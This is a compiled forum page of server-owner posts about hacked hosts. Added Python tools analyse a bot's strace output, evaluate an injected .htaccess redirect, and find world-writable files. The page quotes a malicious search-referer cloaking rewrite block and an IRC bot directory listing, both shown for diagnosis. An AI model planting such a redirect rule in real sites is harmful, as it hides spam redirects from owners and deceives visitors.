_llseek(4, 0, 0xbffb3770, SEEK_CUR) = -1 ESPIPE (Illegal seek)
fcntl64(4, F_SETFD, FD_CLOEXEC) = 0
connect(4, {sa_family=AF_INET, sin_port=htons(6665), sin_addr=inet_addr("83.140.172.210")}, 16) = -1 ETIMEDOUT (Connection timed out)
close(4) = 0
open("/etc/protocols", O_RDONLY) = 4
fcntl64(4, F_GETFD) = 0
fcntl64(4, F_SETFD, FD_CLOEXEC) = 0

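
An added example, not from the post, that reads this kind of strace output. Every syscall carrying an IPv4 sockaddr is parsed, port 53 traffic is reported as the name lookup (the buffer in the send() line holds the label-encoded name irc.quakenet.org), and a connect() to an IRC port is flagged even when it timed out, because for a process that should only be serving HTTP the attempt itself is the indicator. The sample input is the excerpt quoted in the post.

```python
import re

# Sample input: the strace lines quoted in the post above (the DNS lookup on
# port 53 and the attempted IRC connection on 6665).
SAMPLE_TRACE = """\
send(4, "@206113irc10quakenet3org1"..., 34, MSG_NOSIGNAL) = 34
poll([{fd=4, events=POLLIN, revents=POLLIN}], 1, 5000) = 1
recvfrom(4, "@2062012001103irc10quakenet3org1"..., 1024, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("72.36.191.2")}, [16]) = 162
close(4) = 0
socket(PF_INET, SOCK_STREAM, IPPROTO_TCP) = 4
connect(4, {sa_family=AF_INET, sin_port=htons(6665), sin_addr=inet_addr("83.140.172.210")}, 16) = -1 ETIMEDOUT (Connection timed out)
close(4) = 0
"""

# Syscalls that carry a sockaddr_in: name, fd, port, address, return value and
# errno symbol (if any) are all on one line in strace's default format.
SOCKADDR_RE = re.compile(
    r"^(?P<call>connect|sendto|recvfrom|bind)\((?P<fd>\d+),.*?"
    r"sin_port=htons\((?P<port>\d+)\), sin_addr=inet_addr\(\"(?P<ip>[\d.]+)\"\).*?\)"
    r"\s*=\s*(?P<ret>-?\d+)(?:\s+(?P<err>E[A-Z]+))?"
)
IRC_PORTS = set(range(6660, 6670)) | {6697, 7000}


def parse_endpoints(trace):
    """Every syscall in the trace that names an IPv4 endpoint."""
    out = []
    for line in trace.splitlines():
        m = SOCKADDR_RE.match(line)
        if m:
            out.append({"call": m["call"], "ip": m["ip"], "port": int(m["port"]),
                        "ret": int(m["ret"]), "err": m["err"]})
    return out


def irc_connects(endpoints):
    """connect() calls to the usual IRC ports, whether or not they succeeded:
    a timed-out attempt is still a bot looking for its command channel."""
    return [e for e in endpoints if e["call"] == "connect" and e["port"] in IRC_PORTS]


def dns_servers(endpoints):
    return sorted({e["ip"] for e in endpoints if e["port"] == 53})


def verdict(trace):
    eps = parse_endpoints(trace)
    irc = irc_connects(eps)
    return {"irc_c2": [(e["ip"], e["port"], e["err"]) for e in irc],
            "dns_servers": dns_servers(eps),
            "suspicious": bool(irc)}


if __name__ == "__main__":
    print(verdict(SAMPLE_TRACE))
```

A process named httpd running as nobody and resolving an IRC network is the classic shape of a bot dropped through a web application and started under the web server's user; the real /usr/sbin/httpd has no reason to open TCP 6665. The next checks are the process's cwd and executable path under /proc/<pid>/ and the web server's access log around the time the process started.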
My Server Has Been Hacked
My websites worked very well some days ago. I've touched nothing on my server since then and now every website I have on it is down!

I have a VPS and have root access.

When I restart my Apache web server, my websites work for about 3 seconds! Then they don't work any longer!

I've talked to my host; they may find the error if their technicians look at my server, but this will cost!

Has My Server Really Been Hacked
I have a dedicated server on a web host. I have 3 domains hosted on the same server. One of the domains was apparently hacked and a rogue script was installed that was using the exim service to send out spam. At least that's what I thought was going on.

When I contacted tech support at the web host they confirmed that the emails were being sent through my server and told me that there was no way for them to tell me what script was doing it or where it was located in the domain files. At this point I had them stop the exim service on my server so I knew no more spam would be sent out until I could get this web space cleaned up.

I backed up all of my files and the database from that domain and wiped out every file in the domain space by having the web host delete everything from their end. Then I created a new web space for the domain. I didn't load any programs or files whatsoever. Just the bare minimum to support the domain. Then I created the email accounts.

During this process I made sure that I changed every password on the domain. I didn't even use the same login names except for the email accounts. The email account passwords were also new.

As soon as I had the email accounts turned on there was more spam. What I find curious is that I have several email accounts on this domain but it's only one that all of this spam is being sent through. I don't know enough about the mechanics to know if this really is being sent through my server or if someone is just plugging my email address into the spam.

I have not done anything with the other two domains on the server. Is it possible that even though these are saying they are from the fresh domain space they could be from a script on one of the others? ..............

Hacked At OS Level
My VPS has been hacked, as per what the provider emailed me:

Your VPS is hacked at OS level. It was running the following suspicious processes and bot files were uploaded to it.

-bash-3.00# ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 1628 600 ? Ss 19:27 0:00 init boot
root 18326 0.0 0.1 2156 1164 ? Ss 19:27 0:00 bash
root 18354 0.0 0.0 2156 524 ? S 19:27 0:00 bash
root 18356 0.0 0.0 1524 468 ? S 19:27 0:00 sed s/.*ifcfg-venet0://
root 18357 0.0 0.0 1780 100 ? T 19:27 0:00 ls -1 bak/ifcfg-venet0:*
root 18358 0.0 0.0 0 0 ? Z 19:27 0:00 [sed] <defunct>
root 11610 0.0 0.0 1628 296 ? Ss 19:32 0:00 init boot
root 11611 0.0 0.1 2156 1200 ? S 19:32 0:00 /bin/bash /etc/rc.d/rc.sysinit
root 11625 0.0 0.0 1484 572 ? S 19:32 0:00 /sbin/initlog -r /etc/rc.d/rc.sysinit
root 11839 0.0 0.0 1456 276 ? Ss 19:32 0:00 minilogd
root 12006 0.0 0.0 2156 532 ? S 19:32 0:00 /bin/bash /etc/rc.d/rc.sysinit
root 12014 0.0 0.0 1780 104 ? T 19:32 0:00 ls ifcfg-lo ifcfg-venet0
root 12021 0.0 0.0 27104 512 ? S 19:32 0:00 sort -k 1,1 -k 2n
root 12022 0.0 0.0 1372 52 ? T 19:32 0:00 sed s/[0-9]/ &/
root 12025 0.0 0.0 1524 464 ? S 19:32 0:00 sed s/ //
root 12030 0.0 0.0 0 0 ? Z 19:32 0:00 [sed] <defunct>
root 12044 0.0 0.0 0 0 ? Z 19:32 0:00 [sed] <defunct>
root 5654 0.0 0.0 1912 392 ? Ss 22:46 0:00 vzctl: ttyp0
root 5655 0.2 0.1 2156 1248 ttyp0 Ss 22:46 0:00 -bash
root 5733 0.0 0.0 2312 764 ttyp0 R+ 22:46 0:00 ps aux
-bash-3.00# cd /usr/local/games/
-bash-3.00# ls -a
. .. irc
-bash-3.00# cd irc/
-bash-3.00# ls
1 12 15 18 20 23 26 29 31 34 37 4 42 45 48 50 53 56 59 61 64 8 common mfu.txt r00t ssh
10 13 16 19 21 24 27 3 32 35 38 40 43 46 49 51 54 57 6 62 68.231.ps.22 9 full pass_file skan x
11 14 17 2 22 25 28 30 33 36 39 41 44 47 5 52 55 58 60 63 7 all go.sh ps ss
-bash-3.00#

How can I know what the issue is over here?

Website Hacked
My site is hacked regularly.

Today when I checked the .htaccess file I found

Code:
# a0b4df006e02184c60dbf503e71c87ad
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^http://([a-z0-9_-]+.)*(google|msn|yahoo|live|ask|dogpile|mywebsearch|yandex|rambler|aport|mail|gogo|poisk|alltheweb|fireball|freenet|abacho|wanadoo|free|club-internet|aliceadsl|alice|skynet|terra|ya|orange|clix|terravista|gratis-ting|suomi24). [NC]
RewriteCond %{HTTP_REFERER} [?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)=
RewriteCond %{HTTP_REFERER} ![?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)=[^&]+(%3A|%22)
RewriteCond %{TIME_SEC} <59
RewriteRule ^.*$ /admin/editor/filemanager/browser/default/images/ucohex/ex3/t.htm [L]
# a995d2cc661fa72452472e9554b5520c
in it. What does this code do?

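
An added example (mine, not from the post) that shows what the quoted .htaccess block does by evaluating its RewriteCond chain the way mod_rewrite would. The referer must come from one of the listed search engines, must carry a search-query parameter such as q= or p=, and must not contain %3A or %22 in that parameter (that is, no operator searches such as site: and no quoted phrases). %{TIME_SEC} <59 is a lexicographic string compare that is true in every second except :59, so it is practically always on. A visitor who arrives from a search result is rewritten to t.htm under the file manager's images path; the owner typing the URL directly, or a crawler with no referer, gets the normal page, which is why this keeps surviving. The same code finds blocks bracketed by the 32-hex-character comment lines, which is a quick way to locate this injection in other .htaccess files. The sample is the fragment quoted above; the referers in the test are constructed.

```python
import re

# The .htaccess fragment quoted in the post above, used as sample input.
SAMPLE_HTACCESS = """\
# a0b4df006e02184c60dbf503e71c87ad
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^http://([a-z0-9_-]+.)*(google|msn|yahoo|live|ask|dogpile|mywebsearch|yandex|rambler|aport|mail|gogo|poisk|alltheweb|fireball|freenet|abacho|wanadoo|free|club-internet|aliceadsl|alice|skynet|terra|ya|orange|clix|terravista|gratis-ting|suomi24). [NC]
RewriteCond %{HTTP_REFERER} [?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)=
RewriteCond %{HTTP_REFERER} ![?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)=[^&]+(%3A|%22)
RewriteCond %{TIME_SEC} <59
RewriteRule ^.*$ /admin/editor/filemanager/browser/default/images/ucohex/ex3/t.htm [L]
# a995d2cc661fa72452472e9554b5520c
"""

MARKER_RE = re.compile(r"^#\s*([0-9a-f]{32})\s*$")
COND_RE = re.compile(r"^\s*RewriteCond\s+%\{(\w+)\}\s+(\S+)(?:\s+\[([^\]]*)\])?")
RULE_RE = re.compile(r"^\s*RewriteRule\s+(\S+)\s+(\S+)")


def find_marked_blocks(text):
    """Blocks bracketed by two '# <32 hex>' comment lines, as in the sample.
    Returns (start_marker, end_marker, lines_between)."""
    blocks, start, body = [], None, []
    for line in text.splitlines():
        m = MARKER_RE.match(line)
        if m and start is None:
            start, body = m.group(1), []
        elif m:
            blocks.append((start, m.group(1), body))
            start = None
        elif start is not None:
            body.append(line)
    return blocks


def parse_rewrite(lines):
    """RewriteCond/RewriteRule lines -> (conditions, rewrite target)."""
    conds, target = [], None
    for line in lines:
        m = COND_RE.match(line)
        if m:
            var, pat, flags = m.groups()
            conds.append({"var": var, "pat": pat.lstrip("!"),
                          "negate": pat.startswith("!"),
                          "nocase": "NC" in (flags or "").upper()})
            continue
        m = RULE_RE.match(line)
        if m:
            target = m.group(2)
    return conds, target


def cond_holds(cond, env):
    """mod_rewrite semantics for the two forms used here: a regex, or
    '<string', which is a lexicographic comparison (so TIME_SEC <59 holds
    in every second except :59)."""
    value = env.get(cond["var"], "")
    if cond["pat"].startswith("<"):
        ok = value < cond["pat"][1:]
    else:
        ok = re.search(cond["pat"], value, re.I if cond["nocase"] else 0) is not None
    return ok != cond["negate"]


def rule_fires(htaccess, referer, time_sec):
    """Target the visitor is rewritten to, or None if the rule does not apply."""
    blocks = find_marked_blocks(htaccess) or [(None, None, htaccess.splitlines())]
    env = {"HTTP_REFERER": referer, "TIME_SEC": "%02d" % time_sec}
    for _start, _end, body in blocks:
        conds, target = parse_rewrite(body)
        if target and all(cond_holds(c, env) for c in conds):
            return target
    return None


if __name__ == "__main__":
    for ref in ("http://www.google.com/search?q=cheap+widgets", "", "http://example.invalid/page"):
        print(repr(ref), "->", rule_fires(SAMPLE_HTACCESS, ref, 7))
```

Because the rule keys on the referer, checking the site with a browser never shows the problem; fetch a page with a forged Referer header from a search engine to reproduce it. The rewrite target, under /admin/editor/filemanager/browser/, also names the likely entry point: a writable file manager in the admin editor that should not be reachable without authentication.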
Cm Software Always Getting Hacked
We use the SnippetMaster content management software on a few of our sites to allow customers to make changes to their websites.

The software requires that the editable web pages be 777. The problem is, they're often getting hacked (usually just the index.html page being replaced with some rubbish about Muslims and often involving '3sRaR').

I've no idea how he's doing it and it's happening on more than one server.

Can anyone recommend a way to stop this happening whilst being able to maintain the functionality of the CM software?

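
An added example (not SnippetMaster's code) of the check and the narrower fix for the post above: list every file and directory under a document root that is world-writable, then clear only the other-write bit, leaving owner and group write in place. On a shared server 777 means any other customer's scripts, and any script the web server runs for any site, can overwrite the page; the editor only needs the web server's own user to be able to write. The fix here assumes the web server process runs as the owner or in the owning group of those pages; if it runs as a different user, change the ownership or group rather than going back to 777. The sample tree is constructed.

```python
import os
import stat
import tempfile


def world_writable(root):
    """Files and directories under root that any local user (including a
    neighbouring site's scripts on a shared host) may write to."""
    hits = []
    for dirpath, dirs, files in os.walk(root):
        for name in dirs + files:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if stat.S_ISLNK(st.st_mode):
                continue
            if st.st_mode & stat.S_IWOTH:
                hits.append((os.path.relpath(path, root), stat.S_IMODE(st.st_mode)))
    return sorted(hits)


def tighten(root):
    """Clear the other-write bit only (0777 -> 0775, 0666 -> 0664). This keeps
    the editor working where the web server runs as the owner or in the
    owning group, which is the assumption here; otherwise fix ownership."""
    changed = []
    for rel, mode in world_writable(root):
        new_mode = mode & ~stat.S_IWOTH
        os.chmod(os.path.join(root, rel), new_mode)
        changed.append((rel, mode, new_mode))
    return changed


def build_sample_tree():
    """Constructed tree: an editable page and its directory left at 777 as
    the CMS install instructions ask, next to a correctly protected file."""
    root = tempfile.mkdtemp()
    os.mkdir(os.path.join(root, "pages"))
    os.chmod(os.path.join(root, "pages"), 0o777)
    for name, mode in (("pages/index.html", 0o777), ("config.php", 0o644)):
        path = os.path.join(root, name)
        with open(path, "w") as fh:
            fh.write("x\n")
        os.chmod(path, mode)
    return root


if __name__ == "__main__":
    root = build_sample_tree()
    print("before:", world_writable(root))
    print("changed:", tighten(root))
    print("after:", world_writable(root))
```

Run world_writable() on each server after the fix and again a day later: if the bits come back, something (an installer, a cron job, or the attacker's own script) is resetting them, and that is the next thing to find.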
Someone Hacked Cpanel
Last night I checked the bandwidth usage on one of my sites, only to find a different last IP in cPanel. The person who did this changed my index page to a page saying it had been hacked, and changed all my moderators'/admins' ranks to guest, so that means he has accessed phpMyAdmin too.

I'm wondering if anyone knows anything that will help avoid future hacks, and also where I go about getting his ISP to remove his internet connection for hacking. I have a confession from him in email about the hacking. I have banned his IP from cPanel but anyone could change their IP, and I can't exactly ban his entire country from the server.

My Server Has Been Hacked
I have Windows 2003 with all security patches; I run Plesk 8.2 and nothing much else. I use MySQL as a database with port 3306 open so I can connect from the outside (password protected also). I do use strong passwords on my Plesk, administrator etc. I use standard Microsoft FTP, the Windows 2003 firewall, and connect through Plesk or remote connection.

Somebody has been able to penetrate my admin remote desktop :-( I found strange windows open when I connected and in the log there was an indication of a printer driver load. The printer name was one I don't have and my remote connection has printers off. The attacker, although smart, did connect with his printer and that was visible in the log. When he terminated the session I found his IP.

I have since changed my administrator password but it doesn't help; he was in again today. He hasn't done any harm up to now I think; I checked for viruses and spyware.

I don't know what to do any more. He can do whatever he wants and if I don't know how he is getting access to my admin account I cannot stop him. I blocked today with IPSec the whole IP range of his provider, but as he is smart he can hack another computer and connect to me from it (maybe he has already done that and the IP was from a hacked server). This is no solution. I need to patch the hole.

I use ASP scripts but I don't think one can gain access to the whole admin through them, maybe only get access to my database (if I made a mistake and didn't protect against injections or some other things).

I am desperate. Please, if anybody has some ideas what I can do, how do I "catch" him, I mean patch the hole, please let me know.

I had an idea to block all IPs to port 3389 (Remote Desktop) except my IP. But I am a little scared to do that, in case I lock myself out. And even in that case, if he knows the admin password he can get in some other way than using Remote Desktop.

My Server Just Got Hacked
I'm using Windows 2003 Server to host my website.

I was on vacation for 2 weeks so I wasn't able to log onto the server. Nor was there any need to log onto the server, as the website was up and running and was fine!

However, when I logged in today, there were extra icons on my desktop.

My server was turned into a spam e-mail remailer. There were applications installed that dissected/generated e-mail addresses.

In my system logs in Event Viewer, starting from January 30th, there is a whole list of failed logon events where the user tried logging on with different usernames and passwords.

I'm guessing they got into my server by brute force.

I was wondering, does anyone know if Windows 2003 automatically logs the IPs of users trying to log in remotely, and where they are stored?

My Server Hacked
Today while I ran some commands like ls this error appeared: segmentation fault.

Anyway, the reason is my server's hacked. Now I reinstalled it, but my question:

How could my server be hacked while I have disabled compilers for unprivileged users?

I admit that I have found cgi-telnet scripts, but how could he use them to install a rootkit?

Copyright © 2005-08 www.BigResource.com, All rights reserved